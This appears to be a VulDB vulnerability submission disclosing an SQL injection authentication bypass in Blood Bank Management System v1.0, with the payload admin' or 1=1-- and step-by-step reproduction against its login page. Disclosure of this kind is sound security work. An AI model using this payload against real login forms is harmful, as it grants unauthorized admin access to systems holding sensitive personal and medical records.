| 标题 | Blood Bank Management System - SQL Injection "Unauthorized Admin Access" |
|---|
| 描述 | # Exploit Title: Blood Bank Management System - SQL Injection "Unauthorized Admin Access"
# Exploit Author: Madhur Jain
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14547/blood-bank-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/php/14547/blood-bank-management-system-using-phpmysqli-source-code.html
# Version: v1.0
# Tested on: Parrot GNU/Linux 4.10, Apache
Description:-
An SQL injection issue in Blood Bank Management System v.1.0 allows an attacker to login in into admin account.
`
Payload used:-
admin' or 1=1--
`
Parameter:-
Username and Password
`
Steps to reproduce:-
1. First go the admin login
URL = 'http://localhost/bloodbank/login.php'
2. From there in username and password put the payload
Payload:
admin' or 1=1--
3. Now press enter and we get logged in into admin account |
|---|
| 用户 | Madhur Jain (UID 37979) |
|---|
| 提交 | 2022-12-22 17時29分 (4 年前) |
|---|
| 管理 | 2022-12-25 20時26分 (3 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 216773 [SourceCodester Blood Bank Management System 1.0 login.php username/password SQL注入] |
|---|
| 积分 | 17 |
|---|